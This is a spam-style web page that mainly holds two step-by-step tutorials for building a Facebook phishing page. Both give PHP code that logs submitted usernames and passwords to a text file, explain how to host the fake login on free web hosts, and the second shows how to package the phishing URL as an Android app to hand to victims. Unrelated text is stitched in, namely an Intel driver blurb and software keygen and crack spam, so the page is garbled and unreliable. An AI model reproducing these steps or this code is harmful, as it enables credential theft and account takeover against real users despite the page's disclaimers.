How To Create Phishing Site Using Android

In this tutorial, we’re going to take a close look at how to setup a phishing page to harvest usernames and passwords that can be used to hack other users’ Facebook accounts. However, and I can’t stress this enough, this knowledge should never be used to attack others in the real world. It simply isn’t legal, and it isn’t moral, either. If you’ve ever had your username or password stolen, you know how bad it feels when others have violated your privacy.

If you’re reading this with the hopes of learning how to gain access to countless users’ Facebook credentials, I should instead refer you to philosophical ideas on morality. Keeping that in mind, there is a lot of value, especially for aspiring hackers, in understanding how phishing works. Not only will it help you avoid mistakes that threaten your security and privacy, but it will also help you spot fishy phishing sites.

What is Phishing? Wondershare pdf key.

Make an android application using online app creator Step 1: Make a phishing facebook login page as android browser and host to web (Undetectable) First you need to download ‘facebookmobile-app.zip‘ attachment file – Click here to download or Alternate download It contains 5 phishing page files including a folder. Mostly people search for How To create phishing page for Facebook, in Facebook the login portal is visible in the main page so here you need not to find out the login page Here am Not Confusing you by writing too much If you want to create phishing page for a particular website then open the website in a good web browser such as chrome. In phishing, an attacker creates a look alike page of any popular website and sends it to the victim. When the victim enters his login info, the attacker gets the credentials. Do note that it is illegal to it. And this article is for education purposes only.

Description Type OS Version Date; Intel® Graphics Media Accelerator Driver for Windows. 7 64 (exe) This downloads and installs Intel® Graphics Media Accelerator version 15.12.75.4.64.1930 (8.) for the integrated graphics controller of Intel® chipsets for Windows. 7, 64-bit. This package provides the driver for Intel 945GM Graphics Controller and is supported on the Latitude, XPS Notebook, Inspiron, Vostro Notebook and Dimension models that are running the following Windows Operating System: VISTA (32-bit). Intel 945gm driver. Support product highlights, featured content, downloads and more for Graphics Drivers for Mobile Intel® 945GM Express Chipset Family.

Phishing is the process of setting up a fake website or webpage that basically imitates another website. Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows:

A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There’s just one problem. The user, who is really the attacker’s victim, actually entered their private information into a hacker’s website. And now the hacker has their login credentials! In Facebook, this may not be as consequential as another website, like online banking.

However, the hacker can now wreak ungodly amounts of havoc on a person’s social life. If it happens to be a business’s Facebook profile, they can damage their business. Today, however, we are going to setup an imitation Facebook login page to show you just how easy it is to start phishing. Let’s take a closer look at the steps required.

  1. Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.
  2. Go ahead and dump all of the page’s source code into Notepad (or your operating system’s best simple text editor).
  3. If using Notepad, hit ctrl f (which is the find hotkey) and search for action.
  4. You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1″
  5. Delete everything contained in the quotations, and instead fill the quotes with post.php. Now it should read action=”post.php”
  6. Save this file somewhere on your computer with the file name of index.htm. Omit the final period from the filename. This is going to become your phishing page.
  7. Next, create a new notepad document with the name of post.php. Omit the final period from the filename. Copy and paste the following code into this document, and remember to save it:

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

  1. At this point, you should now have two files saved: index.htm and post.php.
  2. Next, this code actually needs to be uploaded to a web hosting service. There are free hosting providers, but I wouldn’t recommend you actually post this code. Instead, it would be better to try this at home on your own webserver. However, for the rest of the tutorial, we’ll be using Bluehost.
  3. After you have signed up for an account, browse to the control panel, and then to file manager.
  4. Once the window opens, go to publick_html.
  5. Delete default.php, and then upload index.htm and post.php.
  6. Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.
  7. The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
  8. Now go back to the file manager and public_html. There should be a file labeled username.txt.
  9. Open this file and you should be able to see login credentials that have been entered by a test user.

Final Thoughts

It really is a simple matter of copying the code from the Facebook login screen, adding some php code, and then setting up a dummy website. Again, don’t try this in the real world, because the consequences could be terrible. However, in a home environment on your own web server, this tutorial provides great insight into how attackers phish for usernames and passwords.

Myob serial number generator engine. The serial number is important for your data file activation as well as if you require support for your product. When you purchase an MYOB product, the serial number can be found either on the CD sleeve or with latest versions, on the Quick & Easy card found inside the CD cover. Paying up to $116 to have your serial number removed - MYOB's Premium Service, no plan. Note re.myox - Our original Serial Number Remover included support for the latest version.myox company files. However since the release of AR2013.1 MYOB Aust have included a free serial replacement facility. Given that all users of AR2011 and AR2012 are. Myob Accountright Premier V19 7 serial numbers, cracks and keygens are presented here. No registration is needed. Just download and enjoy. MYOB Accounting Plus all versions serial number and keygen, MYOB Accounting Plus serial number, MYOB Accounting Plus keygen, MYOB Accounting Plus crack, MYOB Accounting Plus activation key, MYOB Accounting Plus download keygen, MYOB Accounting Plus show serial number, MYOB Accounting Plus key, MYOB Accounting Plus free download, MYOB Accounting Plus d6eb276a find serial number. The serial number for serial is available. This release was created for you, eager to use serial number full and without limitations. Our intentions are not to harm serial software company but to give the possibility to those who can not pay for any piece of software out there.


Hey guys,
I hope you are fine ,now today i am coming with a new method of hacking Facebook using android application ,In my previous postWhat IS a phishing page i explain all steps in sequence wise for your clear understanding , today we use phishing but in another form of phishing ,in this tutorial we make an android application for android device when you or victim install it on your/his android device the fake Facebook phishing page will open when victim enter details all the information is saved in Web hosting server. This method is useable when your victim has android device just say them that install this .apk file and enjoy Facebook hacking with apk.
so now see how you make your own phishing app ,before going to next of the post i just want to tell you again what is phishing and how it work ?

status of phishing

A phishing technique was described in detail in a paper and presentation delivered to the International HP Users Group, Interex.The first recorded mention of the term 'phishing' is found in the hacking tool AOHell (according to its creator), which included a function for attempting to steal the passwords or financial details of America Online users. According to Ghosh, there were 445,004 attacks in 2012 as compared to 258,461 in 2011 and 187,203 in 2010, showing that phishing has been increasingly threatening individuals.

A recent and popular case of phishing is the suspected Chinese phishing campaign targeting Gmail accounts of highly ranked officials of the United States and South Korean Government, military, and Chinese political activists. The Chinese government continues to deny accusations of taking part in cyber-attacks from within its borders, but evidence has been revealed that China own People Liberation Army has assisted in the coding of cyber-attack software

Requirement:

  • 1-you need facebook phishing page with php script (don't worry if you don't know about it i explain it below)

  • 2-A web-hosting account where you host your phishing page

Phishing
  • 3-and some time( at least 10 minutes if you are newbie)

Lets start our tutorial :

for your clear understanding i divide this tutorial in two section listed below:
  • A-) Make phishing page and upload it on webhosting server

  • B-) Make the android application using phishing page

A) Step by step guide to make Facebook phishing page and upload it on server

step:1.) first of all Go to the www.Facebook.com

step:2)
and then right click on the blank area, you will see the option view source page,simply click on that.(see bellow picture for better understanding )
Phishing
step:3) now a pop up window will be open which contain a source code of Facebook page, And Copy all the code using Ctrl+c
step:4) Now open the notepad and past all code here which copy in step 3

step:5) now press CTRL+F,and type ACTION.(see bellow picture)
How

step:6) You will have to search action again and again(press enter key 4-5 times) till you get like bellow code
action='https://www.facebook.com/login.php?login_attempt=1'
step:7) After that delete all the text written in inverted comma and instead of it write hack.php.then it will look like.( see bellow given picture)
action='hack.php'
steP:8) Now save it on your desktop with the name index.htm,not index.html,remember.
step:9) Now your phishing page is ready.it will look like a pic given bellow .


step:9) now you need to create a php file for this Open a new notepad and copy the bellow code and save it with the name hack.php.
<?php
header ('Location:http://www.google/');
$handle = fopen('usernames.txt', 'a');
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, '=');
fwrite($handle, $value);
fwrite($handle, 'rn');
}
fwrite($handle, 'rn');
fclose($handle);
exit;
?>
Note: I use hack.php in step 7 that's why we need to use same name in step 9
step:10) You have successfully created two files

  • index.htm
  • hack .php,

step:11)
now you need to upload these two files in a free web hosting site i am giving you the list of best webhosting site which are useful for you . you need to make a account on any of one below webhosting site.(I think the list is perfect for you)
www.my3gb.com
www.000webhost.com
www.freewebhosting.com
www.xhosting.com
http://110mb.com
http://ripway.com
http://superfreehost.info
http://freehostia.com
http://freeweb7.com
http://t35.com
http://awardspace.com
http://phpnet.us
http://prohosts.org
http://www.freezoka.com/
http://atspace.com


Note: I prefer 000webhost.com/my3gb.com because it is easy to use if it not work for you try another webhosting service which are mention above ,so here i am going to use my3gb.com in further steps

step:12)
first of all make an account so go to www.my3gb.com and click on register button which is located in upper side bar.

step:13) now simply fill all necessary information in registration form

step:14) when your account completely setup simply login with your username and password

Free Phishing Sites

step:15) when you open your account you see control panel like bellow picture ,now click on file manager.
step:16) now file manager will open and you need to upload index.htm and hack.php file ,simply click on upload files button and upload both files there after uploading it look like bellow picture.

step:17) now click on index.htm file you see fake facebook page simply copy the url from your web browser url address bar .your link look like bellow :
http://www.yourusername.my3gb.com/index.htm

Note: note down the link which is mention above we will use this link in step 21
B)Make an android application using online app creator
step:18) first of all Go to this site www.appsgeyser.com which offer to create a android application online without having any coding or extra knowledge of any programming language.
step:19) after that you need to Click on CREATE NOW Button

How to identify phishing email
step:20) here you get few option like below picture simply Click the option 'website'
step:21) Here in this window you will see some fields ,fill them like below
  • website url : Enter the phishing page's url (that you created in step17)

How To Create Phishing Site Using Android Phone

How To Create Phishing Site Using Android
  • App name: Facebook or something related with facebook,

  • Description: here give description about your app what ever you want ,

  • Icon: In icon field you have two option one is use your 'cutsom icom and second is default icon choose one which you want.

step:23) when you filled all the required fields just Click 'Create app' button for creating your own phishing app and you have almost done!
step:24) when you click on 'create app' button a new window will open and ask for your name,last name ,email,password simply enter all fields and hit 'sign up' button
step:25) now when you make an account successfully simply open your control panel here you see the option 'download your application' hence download your android phishing facebook app easily.
that's it guys.

Create A Phishing Site


if you follow all procedure step by step then i'm dame sure that you easily make your own app ,if you faced any problem in any steps past your comment using below comment box ,if you like my post please don't forget to share my post .
By S0ft Hcks!

MR:47{XYBERSHEIKH}